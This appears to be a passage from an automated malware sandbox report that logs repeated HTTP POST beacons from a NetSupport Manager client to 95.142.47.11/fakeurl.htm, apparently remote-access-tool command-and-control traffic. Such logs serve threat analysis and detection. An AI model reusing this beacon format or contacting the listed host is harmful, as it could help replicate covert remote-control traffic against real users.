                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:39.163798094 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:39.263770103 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:39.364758968 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:39.464740038 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:39.564763069 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:39.665756941 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:39.765769005 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:39.865864992 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:39.965748072 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:40.065774918 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:40.166764975 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:40.311232090 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:40.410738945 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:40.511862040 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:40.611732006 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:40.941200972 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:41.059503078 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:41.160835981 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:41.360806942 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:41.461749077 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:41.562726021 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:41.662763119 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:41.762754917 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:41.964735985 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:42.064816952 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:42.165745974 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:42.266726017 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:42.366745949 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:42.466741085 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:42.567714930 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:42.667752981 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:42.767729998 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:42.868766069 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:42.969733953 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:43.069993019 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:43.170741081 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:43.270776987 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:43.371740103 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:43.471786976 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:43.572858095 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:43.672756910 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:43.773767948 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:43.873970985 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:43.973735094 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:44.174786091 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:44.274728060 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:44.375900030 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:44.475840092 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:44.576864958 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:44.677858114 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:44.777734041 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:44.878137112 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:44.978745937 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:45.079001904 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:45.179740906 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:45.280755997 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:45.380768061 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:45.482151985 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:45.581758022 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:45.682753086 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:45.782738924 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:45.882750988 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:45.983733892 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:46.083713055 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:46.183751106 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:46.283926010 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:46.384795904 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:46.484735012 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:46.584836960 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:46.685748100 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:46.786751032 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
